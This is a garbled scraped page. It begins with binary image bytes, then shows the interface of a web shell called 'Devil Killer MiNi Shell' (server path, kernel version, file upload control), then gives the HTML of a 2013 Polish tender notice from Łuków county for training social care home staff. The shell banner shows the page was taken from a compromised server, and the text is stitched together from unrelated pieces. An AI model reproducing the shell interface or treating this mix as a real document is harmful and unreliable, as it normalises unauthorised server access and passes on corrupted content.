JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130821/337136-N-2013.html

<p class="kh_header"><b>Łuków: Przeprowadzenie
szkoleń i kursów w ramach projektu pn. Rozbudowa i modernizacja DPS w Łukowie
działaniem przeciw wykluczeniu społecznemu dzieci i młodzieży niepełnosprawnej
intelektualnie</b><br>
<b>Numer ogłoszenia: 337136 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Łukowski , ul. Józefa Piłsudskiego 17, 21-400 Łuków, woj. lubelskie, tel. 025 7982203, faks 025 7987491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwolukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie
szkoleń i kursów w ramach projektu pn. Rozbudowa i modernizacja DPS w Łukowie
działaniem przeciw wykluczeniu społecznemu dzieci i młodzieży niepełnosprawnej
intelektualnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie oraz przeprowadzenie szkoleń i
kursów dla pracowników Domu Pomocy Społecznej w Łukowie w ramach projektu pn.
Rozbudowa i modernizacja DPS w Łukowie działaniem przeciw wykluczeniu społecznemu dzieci i młodzieży niepełnosprawnej intelektualnie realizowanego w ramach Programu Poprawa jakości usług świadczonych w domach pomocy społecznej i placówkach opiekuńczo - wychowawczych. Celem prowadzonych szkoleń i kursów jest podniesienie kwalifikacji i umiejętności pracowników, które będą wykorzystywane w codziennej pracy z wychowankami placówki.
Dane o projekcie: Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi w Unii Europejskiej. Celem projektu jest poprawa usług podstawowej opieki zdrowotnej i usług opieki społecznej na peryferyjnych i zmarginalizowanych terenach obszarów objętych koncentracją geograficzną, z preferencją dla wielosektorowego podejścia programowego.
2. Przedmiot zamówienia obejmuje następujące szkolenia i kursy:
a) Proces adaptacji mieszkańca i inne sytuacje wzmożonej aktywności Zespołu Opiekuńczo-Terapeutycznego
- Tematyka: adaptacja, plan adaptacyjny, sposób oceny nowo przybyłych mieszkańców, diagnoza potrzeb - sposoby, sytuacje trudne wymagające interwencji i decyzji Zespołu Opiekuńczo-Terapeutycznego;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6-godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Łączna ilość osób - 19, podział na 3 grupy; każda grupa musi mieć szkolenie w innym dniu;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 30.09.2013 r.;
- Miejsce realizacji zajęć: Miasto Łuków.
b) Nawiązanie komunikacji interpersonalnej w relacji pracownik - mieszkaniec DPS jako warunek skutecznej opieki
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Łączna ilość osób - 25, podział na 3 grupy; każda grupa musi mieć szkolenie w innym dniu;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 30.09.2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
c) Seksualność podopiecznych, kształtowanie postaw, interwencja terapeutyczna w sytuacjach trudnych
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Łączna ilość osób - 13, podział na 3 grupy; każda grupa musi mieć szkolenie w innym dniu;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej, psychoterapii bądź seksuologii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii lub seksuologii;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 30.09.2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
d) Stres i wypalenie zawodowe
- Tematyka: nowoczesne metody terapii radzenia sobie ze stresem oraz wypaleniem zawodowym;
- Sposób prowadzenia zajęć: szkolenie 2-dniowe wyjazdowe połączone z wypoczynkiem i SPA, dziennie co najmniej 6 godz. zajęć oraz minimum 3 relaksacyjne zabiegi dla każdego uczestnika szkolenia; W ramach zadania Wykonawca zapewni dla uczestników szkolenia zakwaterowanie w miejscu szkolenia, pełne 2-dniowe wyżywienie oraz ich transport z siedziby DPS do miejsca szkolenia i z miejsca Szkolenia do siedziby DPS;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;;
- Łączna ilość osób - 24, podział na 3 grupy, każda grupa musi mieć szkolenie w innym terminie;
- Termin realizacji zajęć: od dnia 01.10.2013 do dnia 30.11.2013 r.
- Miejsce realizacji zajęć: Nałęczów lub inna miejscowość uzdrowiskowa położona w odległości nie większej niż 150 km od siedziby DPS.
e) Przymus bezpośredni wobec mieszkańca DPS
- Tematyka: aspekty prawne oraz konsekwencje użycia przymusu bezpośredniego;
- Sposób prowadzenia zajęć: 1-dniowe co najmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł radcy prawnego;
- Łączna ilość osób - 7;
- Termin realizacji zajęć: IV kwartał 2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
f) Prawne aspekty ubezwłasnowolnienia, opieki prawnej i kurateli w działalności DPS
- Tematyka: ubezwłasnowolnienie - przepisy prawne, kuratela - zastosowanie - przepisy prawne;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł radcy prawnego;
- Łączna ilość osób - 7 osób;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 30.09.2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
g) Jak niwelować agresję słowną i fizyczną dzieci i młodzieży niepełnosprawnej intelektualnie przebywającej w DPS
- Tematyka: definicja agresji i lęku - rodzaje, sposoby reagowania i terapii, udzielenie pomocy;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;;
- Łączna ilość osób - 24, podział na 3 grupy, każda grupa musi mieć szkolenie w innym dniu;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 30.09.2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
h) Język migowy - podstawy
- Tematyka: budowa narządu mowy, nauka znaków migowych, podejście do pacjenta głuchego;
- Sposób prowadzenia zajęć: 3-dniowy, kurs języka migowego (8 godz. zajęć dziennie, łącznie nie mniej niż 24 godz. zajęć). W ramach zadania Wykonawca zapewni kursantom przerwę kawową i obiad;
- Kurs zostanie przeprowadzony przez osobę posiadającą minimum roczne doświadczenie w prowadzeniu kursów języka migowego odpowiadających swoją tematyką przedmiotowi zamówienia;
- Łączna ilość osób - 4;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 31.12.2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
i) Masaż Bańką Chińską
- Tematyka: nauka wykonywania masażu oraz efekty stosowania masażu Bańką Chińską;
- Sposób prowadzenia zajęć: 1-dniowy przynajmniej 6-godzinny kurs wykonywania masażu Bańką Chińską. Wykonawca w ramach kursu dostarczy Zamawiającemu zestaw Baniek Chińskich (co najmniej 4 szt.) oraz zapewni kursantowi przerwę kawową i obiad;
- Ilość osób - jedna;
- Termin realizacji zajęć: IV kwartał 2013 r.;
- Miejsce realizacji zajęć: w odległości nie większej niż 150 km od siedziby DPS.
j) Kurs stolarski
- Tematyka: nauka obsługi maszyn i narzędzi wykorzystywanych do pracy w stolarni;
- Sposób prowadzenia zajęć: praktyczna nauka zawodu, łączna ilość godzin nie mniej niż 60. Wykonawca w ramach kursu zapewni kursantowi przerwę kawową i obiad;
- Kurs zostanie przeprowadzony przez osobę posiadającą minimum roczne doświadczenie w prowadzeniu kursów stolarskich odpowiadających swoją tematyką przedmiotowi zamówienia;
- Ilość osób - jedna;
- Termin realizacji zajęć: od dnia podpisania umowy do dnia 31.12.2013 r.;
- Miejsce realizacji zajęć: do 30 km od siedziby DPS.
k) Integracja ze środowiskiem społecznym dzieci i młodzieży niepełnosprawnej intelektualnie
- Tematyka: sposoby integracji ze środowiskiem społecznym dzieci i młodzieży niepełnosprawnej intelektualnie;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6 godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Łączna ilość osób - 14, podział na 3 grupy, każda grupa musi mieć szkolenie w innym dniu;
- Termin realizacji zajęć: IV kwartał 2013 r.
- Miejsce realizacji zajęć: Miasto Łuków.
l) Metody pracy z lekko, umiarkowanie i głęboko upośledzonymi
- Tematyka: charakterystyka poszczególnych stopni niepełnosprawności, metody pracy: Knill, Sherborne, integracja polisensoryczna, itp.;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6-godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Łączna ilość osób - 24, podział na 3 grupy, każda grupa musi mieć szkolenie w innym dniu;
- Termin realizacji zajęć: I kwartał 2014 r.
- Miejsce realizacji zajęć: Miasto Łuków.
m) Szkolenie z laseroterapii
- Tematyka: Obsługa i zastosowanie lasera przy różnorodnych schorzeniach;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6-godzinne szkolenie praktyczne z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą wykształcenie średnie lub wyższe o kierunku rehabilitacja lub fizjoterapia oraz co najmniej roczne doświadczenie w prowadzeniu kursów z laseroterapii;
- Ilość osób - 1;
- Termin realizacji zajęć: I kwartał 2014 r.;
- Miejsce realizacji zajęć: w odległości nie większej niż 150 km od siedziby DPS.
n) Formy efektywnego spędzania wolnego czasu dzieci i młodzieży z niepełnosprawnością intelektualną
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6-godzinne szkolenie z przerwą kawową i obiadem;
- Łączna ilość osób - 24, podział na 3 grupy, każda grupa musi mieć szkolenie w innym dniu;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą wykształcenie wyższe o specjalności kulturalno-oświatowej lub psychologicznej;
- Termin realizacji zajęć: I kwartał 2014 r.;
- Miejsce realizacji zajęć: Miasto Łuków.
o) Integracja sensoryczna
- Tematyka: formy pracy, efekty, dobór metod pracy;
- Sposób prowadzenia zajęć: 5-dniowe szkolenie wyjazdowe (8 godz. zajęć dziennie, łącznie nie mniej niż 40 godz. zajęć). W ramach zadania Wykonawca zapewni dla uczestników szkolenia zakwaterowanie w miejscu szkolenia, pełne 5-dniowe wyżywienie oraz ich transport z siedziby DPS do miejsca szkolenia i z miejsca Szkolenia do siedziby DPS;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Łączna ilość osób - 3;
- Termin realizacji zajęć: od dnia 1 kwietnia 2014 r. do dnia 31.05.2014 r.;
- Miejsce realizacji zajęć: w odległości nie większej niż 150 km od siedziby DPS.
p) Diagnostyka nowoprzybyłych mieszkańców z niepełnosprawnością intelektualną oraz układanie planów wspierania mieszkańca krótko i długoterminowe
- Tematyka: obserwacja - na czym polega, co należy oceniać i w jaki sposób, budowanie diagnozy i planów, zakresy działań, obszary objęte działaniem;
- Sposób prowadzenia zajęć: 1-dniowe przynajmniej 6-godzinne szkolenie z przerwą kawową i obiadem;
- Szkolenie zostanie przeprowadzone przez osobę posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- Łączna ilość osób - 19, podział na 3 grupy, każda grupa musi mieć szkolenie w innym dniu;
- Termin realizacji zajęć: od dnia 1 maja 2014 r. do dnia 31 maja 2014 r.
- Miejsce realizacji zajęć: Miasto Łuków.
3. Ze względu na fakt, iż w różnych szkoleniach i kursach będą brali udział Ci sami
pracownicy DPS terminy poszczególnych szkoleń i kursów nie mogą się ze sobą
pokrywać.
4. Szkolenia i kursy zostaną przeprowadzone według harmonogramu zatwierdzonego
przez Dyrektora Domu Pomocy Społecznej w Łukowie, sporządzonego uprzednio przez Wykonawcę.
5. Liczbę osób w danej grupie wyznaczy Dyrektor Domu Pomocy Społecznej w Łukowie uwzględniając potrzeby kadrowe placówki.
6. Po ukończonym szkoleniu (kursie) Wykonawca wystawi każdemu uczestnikowi
certyfikat potwierdzający uczestnictwo w danym szkoleniu (kursie) oraz określający
zakres zdobytych umiejętności i uzyskanych kwalifikacji. Na każdym z wystawianych
certyfikatów Wykonawca zamieści informację o współfinansowaniu o następującej
treści: Szkolenie (kurs) współfinansowane(-y) przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii
Europejskiej.
7. W przypadku szkoleń i kursów odbywających się w odległości większej niż 2 km od siedziby DPS Wykonawca zorganizuje we własnym zakresie oraz na własny koszt i ryzyko przejazd uczestników z siedziby DPS na miejsce szkolenia (kursu) oraz z miejsca szkolenia (kursu) do siedziby DPS.
8. Wykonawca pokrywa wszystkie koszty związane z organizacją oraz prowadzeniem szkoleń i kursów, z zakwaterowaniem i wyżywieniem uczestników, z ich przejazdem na miejsce i z miejsca szkolenia (kursu).
9. Godzina szkoleniowa w ramach niniejszego zamówienia wynosi 60 minut zajęć.
10. W ramach przerwy kawowej każdy uczestnik szkolenia (kursu) winien mieć dostęp i możliwość konsumpcji kawy, herbaty, co najmniej 3 rodzajów soków naturalnych i co najmniej 3 rodzajów ciasta.
11. W ramach obiadu każdy uczestnik szkolenia (kursu) winien mieć możliwość
konsumpcji obiadu dwudaniowego (gorący posiłek: zupa oraz drugie danie) z sokiem
lub kompotem. W przypadku szkolenia (kursu) wypadającego w piątek Wykonawca
zapewni danie bezmięsne.
12. Szkolenia (kursy) odbywać się będą w pomieszczeniach zapewniających warunki
pracy osobom szkolącym się (kursantom) zgodne z obowiązującymi przepisami w
zakresie bezpieczeństwa i higieny pracy. W trakcie szkolenia (kursu) uczestnicy muszą mieć swobodny dostęp do sanitariatów.
13. Dla szkoleń (kursów) wyjazdowych Wykonawca zapewni uczestnikom
zakwaterowanie w ośrodku/hotelu/pensjonacie o standardzie hotelu co najmniej
dwugwiazdkowego. Pokoje 1-2-osobowe z łazienkami, bieżącą i ciepłą wodą oraz TV, w pokojach ręczniki dla gości.
14. Materiały własne i opracowania wykładowców obejmujące swoim zakresem
tematykę szkolenia (kursu) oraz jego cały cykl spięte w estetyczny sposób lub
zbindowane zostaną wydane uczestnikom szkolenia (kursu) w momencie jego
rozpoczęcia. Na wszelkich materiałach szkoleniowych Wykonawca zamieści informację o współfinansowaniu Szkolenia (kursu) o następującej treści: Szkolenie (kurs) współfinansowane(-y) przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej.
15. Szkolenia i kursy muszą być przeprowadzone przez wykładowców posiadających
kwalifikacje i umiejętności adekwatne do zakresu programowego prowadzonych przez nich szkoleń (kursów)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 3 500 zł (słownie: trzy tysiące pięćset złotych). 2. Wykonawca może wnieść wadium w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 PZP: - pieniądzu, - poręczeniach
bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, - gwarancjach bankowych, - gwarancjach ubezpieczeniowych, - poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42 z 2007r. poz. 275 z późniejszymi zmianami). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego o numerze 14 1500 2208 1222 0000 2081 0000 w Banku Zachodnim WBK S.A. 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Starostwo Powiatowe w Łukowie, ul. Piłsudskiego 17, 21-400 Łuków w kancelarii pok. 209 lub dołączyć do oferty. 7. Wniesienie wadium po terminie lub w sposób inny niż określony w SIWZ spowoduje wykluczenie Wykonawcy, zgodnie z dyspozycją art. 24 ust. 2 pkt 2 PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia
Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44
ustawy Prawo zamówień publicznych, złożonego na lub w formie druku
stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia
Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44
ustawy Prawo zamówień publicznych, złożonego na lub w formie druku
stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia
Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44
ustawy Prawo zamówień publicznych, złożonego na lub w formie druku
stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w odniesieniu do Wykonawców,
którzy dysponują osobami zdolnymi do wykonania zamówienia, w tym co
najmniej:
- jedną osobą posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej bądź psychoterapii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii;
- jedną osobą posiadającą tytuł magistra oraz ukończone studia wyższe lub studia podyplomowe z zakresu pomocy społecznej, psychoterapii bądź seksuologii lub specjalistyczny kurs uprawniający do prowadzenia zajęć z zakresu psychoterapii lub seksuologii;
- jedną osobą posiadającą wykształcenie średnie lub wyższe o kierunku rehabilitacja lub fizjoterapia oraz co najmniej roczne doświadczenie w prowadzeniu kursów z laseroterapii;
- jedną osobą posiadającą minimum roczne doświadczenie w prowadzeniu kursów stolarskich odpowiadających swoją tematyką przedmiotowi zamówienia;
- jedną osobą posiadającą minimum roczne doświadczenie w prowadzeniu kursów języka migowego odpowiadających swoją tematyką przedmiotowi zamówienia;
- jedną osobą posiadającą tytuł radcy prawnego;
- jedną osobą posiadającą wykształcenie wyższe o specjalności kulturalno-oświatowej lub psychologicznej.
W celu potwierdzenia spełniania tego warunku
Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu
zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
zakresu wykonywanych przez nie czynności oraz informacją o podstawie do
dysponowania tymi osobami - sporządzony na lub w formie druku stanowiącego
załącznik nr 4 do SIWZ. W przypadku powoływania się na potencjał innych
podmiotów Wykonawca do oferty jest zobowiązany dołączyć pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów
na okres korzystania z nich przy wykonywaniu zamówienia. Należy wyjaśnić, że
zobowiązania podmiotów trzecich do udostępnienia zasobów, złożone w formie
kopii poświadczonej za zgodność z oryginałem przez wykonawcę, nie spełniają
wymogu formy pisemnej. Jedynie złożenie oryginału dokumentu zawierającego
podpis osoby pod treścią oświadczenia, spełnia wymóg formy pisemnej
zobowiązania, określonej w art. 26 ust. 2b Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia
Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44
ustawy Prawo zamówień publicznych, złożonego na lub w formie druku
stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
